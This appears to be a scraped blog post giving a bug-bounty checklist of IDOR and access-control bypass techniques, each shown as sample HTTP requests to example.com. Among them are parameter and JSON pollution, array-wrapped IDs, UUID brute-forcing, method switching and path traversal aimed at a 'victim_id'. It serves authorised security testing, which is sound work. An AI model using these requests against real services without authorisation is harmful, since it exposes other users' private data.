.png)
7 hours ago
6 BOOK THIS SPACE FOR AD
ARTICLE AD- [ ] Add parameters onto the endpoints for example, if there was
```
GET /api/v1/getuser HTTP/1.1
Host: example.com
Try this to bypass
GET /api/v1/getuser?id=1234 HTTP/1.1
Host: example.com
…
```
- [ ] Bypass by appending
```
%20, %09, %0b, %0c, %1c, %1d, %1e, %1f, /
```
- [ ] Large Integer Values
```
GET /api/get_profile?user_id=350 → 403
Host: example.com
…
GET /api/get_profile?user_id=00000000000000350 → 200
Host: example.com
```
- [ ] Negative IDs, Decimal Numbers, String Values with Delimiters
```
#Negative IDs
GET /api/get_profile?user_id=-350
Host: example.com
Description:
Negative values might be treated differently by the application, possibly bypassing certain validation checks
………
#Decimal Numbers
GET /api/get_profile?user_id=350.0
Host: example.com
………
#String Values with Delimiters
GET /api/get_profile?user_id=”350,351"
Host: example.com
```
- [ ] Check if page source contains numeric id
Ctrl + U
<form method=”post” action=”./QuotePrint.aspx?Id=27461&t=8220&isThrowEx=1" id=”form1">
```
- [ ] Change self , me , etc. to your id
```
GET /api/me/get_profile
Host: example.com
…
#response show your info and your id
GET /api/25466/get_profile
Host: example.com
```
- [ ] Check if UUID is similar
```
#create two account and look for UUID
example:
account1: f47ac10b-58cc-4372-a567–0e02b2c3d479
account2: f47ac10b-58cc-4372-a567–0e02b2c3d574
#you just need to brute last 3 digit
```
- [ ] HTTP Parameter pollution
```
POST /api/get_profile HTTP/1.1
Host: example.com
user_id=hacker_id&user_id=victim_id
…
GET /api/get_profile?user_id=hacker_id&user_id=victim_id
Host: example.com
```
- [ ] Add .json to the endpoint
```
GET /v2/GetData/1234 HTTP/1.1
Host: example.com
…
Try this to bypass
GET /v2/GetData/1234.json HTTP/1.1
Host: example.com
…
```
- [ ] Test on outdated API Versions
| ==Initial Request== | ==Bypass Request== |
| — — — — — — — — — — — — — — — — — — — — — — — — — — | — — — — — — — — — — — — — — — — — — — — — — — — — — |
| POST /**v1**/GetData HTTP/1.1Host: example.comid=123 | POST /**v2**/GetData HTTP/1.1Host: example.comid=123 |
- [ ] Wrap the ID with an array.
```
POST /api/get_profile HTTP/1.1
Host: example.com
{“user_id”:111}
Try this to bypass
POST /api/get_profile HTTP/1.1
Host: example.com
{“id”:[111]}
……..
#also
POST /api/get_profile HTTP/1.1
Host: example.com
{“id”:[111,112]}
111 → your id
112 → victim id
```
- [ ] Wrap the ID with a JSON object
```
POST /api/get_profile HTTP/1.1
Host: example.com
…
{“user_id”:111}
Try this to bypass
POST /api/get_profile HTTP/1.1
Host: example.com
…
{“user_id”:{“user_id”:111}}
```
- [ ] JSON Parameter Pollution.
```
POST /api/get_profile HTTP/1.1
Host: example.com
…
{“user_id”:”hacker_id”,”user_id”:”victim_id”}
```
- [ ] Try decode the ID, if the ID encoded using md5,base64,etc.
```
GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1
Host: example.com
…
dmljdGltQG1haWwuY29t => victim@mail.com
```
- [ ] If the website using GraphQL, try to find IDOR using GraphQL.
```
GET /graphql HTTP/1.1
Host: example.com
…
GET /graphql.php?query= HTTP/1.1
Host: example.com
```
- [ ] MFLAC (Missing Function Level Access Control)
```
GET /admin/profile HTTP/1.1
Host: example.com
Try this to bypass
GET /ADMIN/profile HTTP/1.1
Host: example.com
…
```
- [ ] Try to swap uuid with number
```
GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1
Host: example.com
…
Try this to bypass
GET /file?id=302
Host: example.com
…
```
- [ ] Change HTTP Method
```
GET /api/v1/users/profile/111 HTTP/1.1
Host: example.com
…
Try this to bypass
POST /api/v1/users/profile/111 HTTP/1.1
Host: example.com
PATCH /api/v1/users/profile/111 HTTP/1.1
Host: example.com
```
- [ ] Path traversal
```
GET /api/v1/users/profile/victim_id HTTP/1.1
Host: example.com
…
Try this to bypass
GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1
Host: example.com
…
```
- [ ] Change request `Content-Type`
```
GET /api/v1/users/1 HTTP/1.1
Host: example.com
Content-type: application/xml
Try this to bypass
GET /api/v1/users/2 HTTP/1.1
Host: example.com
Content-type: application/json
```
- [ ] Send wildcard instead of ID
```
GET /api/users/111 HTTP/1.1
Host: example.com
…
Try this to bypass
GET /api/users/\* HTTP/1.1
Host: example.com
…
GET /api/users/* HTTP/1.1
Host: example.com
…
GET /api/users/% HTTP/1.1
Host: example.com
…
GET /api/users/\_ HTTP/1.1
Host: example.com
…
GET /api/users/_ HTTP/1.1
Host: example.com
…
GET /api/users/. HTTP/1.1
Host: example.com
```
Bengali (Bangladesh) · 
English (United States) ·